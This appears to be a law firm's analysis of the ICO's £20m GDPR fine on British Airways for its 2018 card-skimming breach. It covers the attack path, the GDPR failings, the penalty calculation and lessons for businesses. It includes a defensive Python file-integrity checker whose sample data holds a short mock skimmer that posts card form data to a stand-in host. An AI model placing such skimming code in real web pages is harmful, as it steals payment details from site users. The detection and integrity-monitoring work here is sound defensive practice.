The UK Information Commissioner’s Office (ICO) has announced a £20 million fine for British Airways (BA) in relation to a data breach.  This is the largest fine the ICO has issued to date under the EU General Data Protection Regulation (GDPR).  It’s a hefty sum, but significantly lower than the £183.39m fine that the ICO declared an intention to impose on BA back on 4 July 2019 (which we wrote about here).

So, what is the fine for, how was it calculated and how come the ICO appears to have softened its approach so significantly?

Waterfront Associate, Jessica Vautier, and Partner, Alison Beryman, have carefully pored over the ICO’s announcement of the fine and all 114 pages of the penalty notice to see whether there are any lessons that the rest of us can take away from this unfortunate set of circumstances…

What personal data was disclosed?

Between 22 June and 5 September 2018, a cyber attacker (or attackers) gained access to BA’s internal systems, obtained details of approximately 108,000 payment cards from logs held there, and then modified a file on the BA website so that cardholder data entered on the site was also sent to a server controlled by the attacker. As a result, the attacker is believed to have potentially accessed the personal data of approximately 429,612 individuals, including:
•    Name, address, card number and CVV number of BA customers – 244,000 data subjects
•    Card number and CVV only – 77,000 data subjects
•    Card number only – 108,000 data subjects
•    Usernames and passwords of BA employee and administrator accounts
•    Usernames and PINs of up to 612 BA Executive Club accounts

How did this happen?

The attacker(s) gained access to an internal British Airways application using compromised login credentials for a Citrix remote access gateway.  The compromised login credentials belonged to an employee of Swissport, a third party cargo services provider used by BA.

How the attacker was able to “break out” of the Citrix environment, thus gaining access to parts of BA’s network usually unavailable to Swissport employees, is not clear – this information has been redacted from the penalty notice (presumably so as not to provide others with details of how to compromise similar systems).  However, we know that the attacker obtained access to a file in which the username and password of a privileged domain administrator account were saved in plain text. This gave them almost unlimited access to BA’s systems.

On 26 July 2018, the attacker accessed files in plaintext containing payment card details for BA redemption transactions. Due to human error, these details were stored unencrypted, and had been logged in this way since December 2015. There was a 95-day retention period, so the only logs available were for the preceding 95 days. However, this still included the details of approximately 108,000 payment cards.

Between 14 August and 25 August 2018, the attacker inserted malicious code on BA’s website meaning that when customers entered their payment card information on www.britishairways.com, a copy of this was sent to the attacker’s website (a process known as “skimming”).

BA became aware of the breach on 5 September 2018, when a third party informed it that data was being sent from its website to another site. Within 90 minutes, BA had fixed the modified code, and 20 minutes later had blocked the URL paths to the attacker’s site. It notified the ICO the following day (6 September), along with 496,636 affected customers, and a further 39,480 affected customers the day after (7 September).

What legal obligations were breached?

The ICO assessed that BA had failed to comply with its obligations under Article 5(1)(f) and Article 32 of the GDPR.

Article 5(1)(f) sets out the principle that personal data shall be processed in a manner which ensures appropriate security of the personal data.

Article 32 concerns the security of processing personal data and requires data controllers to implement appropriate technical and organisational measures to ensure a level of security appropriate to the risk.

Could BA have done anything to prevent the attack?

The ICO has identified numerous measures which BA could have used to mitigate or prevent the risk of an attacker accessing their network.

These include:
•    Limiting users’ access to applications, data and tools to only those required for their role
•    Undertaking rigorous testing on the business’ systems, by simulating a cyber attack
•    Protecting employee and third party accounts with multi-factor authentication
•    Not “hardcoding”, i.e. recording passwords in unencrypted plain text files
•    Manual code reviews
•    Using file integrity monitoring software

The ICO believes that these security measures would not have been significantly costly for BA to implement, but has confirmed that considerable improvements have been made to BA’s IT security since the attack.
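As an added illustration, not part of the original article or of the ICO’s penalty notice, the following Python script shows the kind of file integrity check the ICO listed as a measure BA could have used, run against a constructed sample rather than any real BA file. It baselines the hashes of files under a web root, detects the later modification of a payment-page script, and then flags any external host referenced in the modified file that is not on an allowlist, which is the pattern the skimming described above depends on. All file names, hosts, script contents and the allowlist are hypothetical.

```python
"""Baseline-and-compare file integrity monitoring for a web root, plus a crude
check for unexpected external hosts in JavaScript that a skimmer would add."""
import hashlib
import re
import tempfile
from pathlib import Path

# Constructed sample content (hypothetical, not taken from any real site):
# a clean checkout script and the same script with a skimmer appended.
CLEAN_JS = """document.getElementById('pay').addEventListener('submit', function (e) {
  // legitimate handler posts to the site's own payment endpoint
  fetch('https://www.example-airline.test/api/pay', {method: 'POST', body: new FormData(e.target)});
});
"""

SKIMMED_JS = CLEAN_JS + """
// hypothetical injected skimmer: copies the card form to an attacker-controlled host
document.getElementById('pay').addEventListener('submit', function (e) {
  fetch('https://exfil.example/log', {method: 'POST', body: new FormData(e.target)});
});
"""

ALLOWED_HOSTS = {"www.example-airline.test"}  # hypothetical allowlist of first-party hosts

URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 so large assets do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def baseline(root: Path) -> dict:
    """Map every file under root (relative POSIX path) to its SHA-256 digest."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def compare(root: Path, known: dict) -> dict:
    """Re-hash the tree and report files that changed, appeared or disappeared."""
    current = baseline(root)
    return {
        "modified": sorted(p for p in known if p in current and current[p] != known[p]),
        "added": sorted(p for p in current if p not in known),
        "removed": sorted(p for p in known if p not in current),
    }


def external_hosts(js_text: str) -> set:
    """Collect every host named in an absolute http(s) URL inside the script."""
    return set(URL_HOST_RE.findall(js_text))


def unexpected_hosts(js_text: str, allowed: set = ALLOWED_HOSTS) -> set:
    """Hosts referenced by the script that are not on the first-party allowlist."""
    return external_hosts(js_text) - allowed


def demo() -> dict:
    """Baseline a clean script, simulate the attacker editing it, and report findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "js").mkdir()
        script = root / "js" / "payment.js"
        script.write_text(CLEAN_JS)
        known = baseline(root)
        script.write_text(SKIMMED_JS)  # the served file is modified after baselining
        diff = compare(root, known)
        hosts = {p: sorted(unexpected_hosts((root / p).read_text())) for p in diff["modified"]}
        return {"diff": diff, "unexpected_hosts": hosts}


if __name__ == "__main__":
    print(demo())
```

The hash comparison is what catches the change at all; the host check only adds a hint as to why the change matters. In practice the baseline would be stored off-host and signed, and the check scheduled or triggered on deploy, since an attacker with the privileges described above could otherwise rewrite the baseline along with the file.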

How did the ICO decide on the level of the penalty?

The penalty notice sets out the ICO’s considerations in relation to the penalty figure in extensive detail.  A very brief summary of some of the major points follows.  In determining the appropriate penalty, the ICO had regard to, among other things, the nature, gravity and duration of the failure (Article 83(2)(a) GDPR).

•    The ICO considers the nature and gravity of the failures to be of serious concern due to the amount of personal data that was being processed in an insecure manner (which led to such a large number of individuals being affected); the failure to put in place measures which could have been implemented to prevent the breach; and the fact that BA did not detect the breach themselves.
•    Although the personal data affected was not “special category data”, the data was nevertheless sensitive – for example, the disclosure of full credit card details including CVV numbers put data subjects at heightened risk.
•    In respect of the duration, the ICO took the commencement date of the GDPR (25 May 2018) as the start date and 5 September 2018 as the date on which the breach was discovered and effectively stopped.  (This was different from the previous assessment, in which the breach was considered to have been resolved on 16 November 2018 – the date when all new security measures were put in place by BA to close the security weaknesses that had been exploited.)
•    The ICO recognised that the breach was not a deliberate breach by BA, but did find that they were negligent (Article 83(2)(b) GDPR).
•    The ICO considered that BA, as the data controller, was wholly responsible for the breaches of the GDPR, although it was acknowledged that they were not exclusively responsible for the attack itself.
•    The ICO took into account the mitigating action taken by BA in response to the attack, that BA had no relevant previous infringements, had promptly notified the ICO of the breach, and had cooperated fully with their investigation.

Based on the above, it was determined by the ICO that in principle a penalty of £30m would be appropriate.

This was adjusted to £24m on the basis that:

•    BA had taken immediate measures to mitigate and minimise damage suffered by data subjects
•    BA promptly informed data subjects, law enforcement and regulatory agencies, and cooperated with the ICO’s enquiries
•    Widespread media reporting of the attack is likely to have increased awareness of the risks
•    The attack and subsequent regulatory action had adversely affected BA’s brand and reputation

This amount was further reduced to £20m having regard to the impact of the Covid-19 pandemic (on BA and more generally), in line with the ICO’s published regulatory approach in response to the coronavirus pandemic.

Why was the fine £20m rather than the previously announced £183.39m?

A clear explanation of how the final calculation could be so different from the earlier proposed calculation has not been provided, but the factors below seem likely to have had a bearing on the decision.

The ICO came to the £183.39m figure, published in July 2019, in reliance upon the Draft Internal Procedure for Setting and Issuing Monetary Penalties – this had been developed by the ICO to assist in making penalty figure decisions, using the controller’s turnover as the starting point.  However, having considered BA’s representations, the ICO was persuaded that this procedure was not, in fact, an appropriate mechanism to calculate the level of monetary penalty.

Following the ICO’s notice of intention to issue the £183.39 million fine, BA also provided significant additional information to the ICO.  This appears to have clarified some points of fact, as well as points of law, which affected the ICO’s decision as to the level of the penalty – although it is not entirely clear from the penalty notice what these clarifications were (partly, perhaps, because some facts have necessarily been redacted).

The ICO was required to discuss the level of the fine with the supervisory authorities in the other jurisdictions in which affected data subjects are resident.  The ICO does not disclose to what extent the level of the penalty was adjusted as a result of these discussions (if at all), but given the significance of the reduction, and the fact that no other country’s supervisory authority has so far been reported to have imposed a penalty in excess of £50 million, it seems likely that these discussions had at least some impact.

What should organisations learn from the ICO’s approach in this case?

The list above of the various measures that the ICO expected BA to have taken, and which would likely have prevented or limited the attack, should serve as a helpful reminder to businesses.  Attacks very frequently originate with the compromise of one or more individuals’ login credentials, and it is of vital importance that businesses put in place appropriate technical and organisational measures to restrict any further breach using this stolen information.

It is also useful to consider the mitigating factors listed above, which contributed to a 20% reduction in BA’s fine – in particular the swift action taken to protect data subjects, which all organisations should be ready to take if such a breach ever occurs.

Above all, however, this decision should serve as a warning to all organisations.  Although much less than the sum originally proposed, £20 million is not inconsiderable and fines could be larger still if/when:

•    the ICO reverts to the mechanisms of calculation under the Draft Internal Procedure (particularly for organisations with high turnovers);
•    Brexit means that the ICO is no longer required to consult with overseas supervisory authorities; and
•    the considerations of the effect of Covid are no longer deemed applicable.